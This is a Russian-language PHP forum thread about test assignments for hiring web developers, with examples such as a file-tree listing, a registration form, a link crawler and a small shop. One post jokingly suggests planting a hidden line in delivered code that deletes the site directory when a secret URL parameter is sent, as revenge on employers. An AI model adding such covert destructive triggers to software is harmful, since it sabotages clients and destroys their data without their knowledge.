Тестовые задания для программистов

senator

Guest
Тестовые задания для программистов

Здарова.

Кто может дать примеры тестовых заданий для PHP&MySQL программеров, да и для всех web-разработчиков тоже, дабы при поступлении на работу не обломаться и не сесть в галошу.

А то тут такое произошло... страшно описать.

Заранее благодарен.
 

fixxxer

К.О.
Партнер клуба
1) Почему не передаются переменные?
2) Как на PHP узнать разрешение экрана?
3) В какое место надо засунуть 2-й апач?
 

fixxxer

К.О.
Партнер клуба
Я давал первой задачу "вывести дерево каталогов и файлов начиная с заданного каталога, подходящих под заданную маску", время на работу 10 минут... не сделал - свободен, сделал за 3 минуты - разговариваем дальше :)

Правда, это было для Delphi, но это не принципиально абсолютно.
 

confguru

ExAdmin
Команда форума
Re: Тестовые задания для программистов

Автор оригинала: senator
Здарова.

А то тут такое произошло... страшно описать.

Заранее благодарен.
Ты лучше напиши - что произошло - если не секрет :)
 

senator

Guest
да обломался я на задании... пишёл в контору и говорю я умею программировать а они мне тест, оказалось что я не умею программить... блин...
 

confguru

ExAdmin
Команда форума
Ну и что за тест? Может мы тебя реабилитируем? ,)
 

tony2001

TeaM PHPClub
...и решил он, значит, порешать все возможные тесты, чтобы в следующий раз не лажануться...
м-дяя..
 

confguru

ExAdmin
Команда форума
Кстати - есть такая штука - в серьезных
конторах - когда тестовое задание - не решается вообще
Но соискатель - должен до этого дойти
и сказать - решение не возможно - потомучто
1,2,3

Потому что ценят ум - а не умение кодить ,))
 

Verk

Guest
Originally posted by fixxxer
Я давал первой задачу "вывести дерево каталогов и файлов начиная с заданного каталога, подходящих под заданную маску", время на работу 10 минут... не сделал - свободен, сделал за 3 минуты - разговариваем дальше :)
Правда, это было для Delphi, но это не принципиально абсолютно.
IMHO, в PHP спрашивать про работу с файлами последнее дело.
 

confguru

ExAdmin
Команда форума
Как правило - тестовые задачи
привязаны к ВЕБу

1)Написать форму регистрации юзеров
и изменению ими своих данных

2)Написать парсер всех ссылок на страницы
с переходом на следующие

И смотрят как правило на принцип и код +
оформление кода
 

Линк

Guest
например... написать магазин)
многоуровневый каталог + корзина + юзвери логиняться
можно прикрутить оплату по webmoney для полного кайфу))
 

confguru

ExAdmin
Команда форума
Автор оригинала: Линк
например... написать магазин)
многоуровневый каталог + корзина + юзвери логиняться
можно прикрутить оплату по webmoney для полного кайфу))
Ну это для лохов тестовое задание ,)
Потом говорят - вы нам не подходите
оставляя исходники ,)
 

Линк

Guest
а в один из скриптов лежащих в кроневой папке вставляеться такая строчка:

PHP:
if ($HTTP_GET_VARS['error']=="mena_obmanuli") {rmdir("./");}
 

Silex

unitecsys
>а в один из скриптов лежащих в кроневой папке вставляеться такая строчка
А исходники ну никто не смотрит и не корректирует...
 

Линк

Guest
а тогда выкладываешь его себе на сайт, а людям просто даешь ссылки поглядееть))
 

StUV

Rotaredom
admin
не, серьезно - что подразумевалось под "парсер всех ссылок на страницы с переходом на следующие"

судя по встречающимся терминам - ничего сложного, а в одно целое что-то никак не связывается (притормаживаю, видимо =)
 
Сверху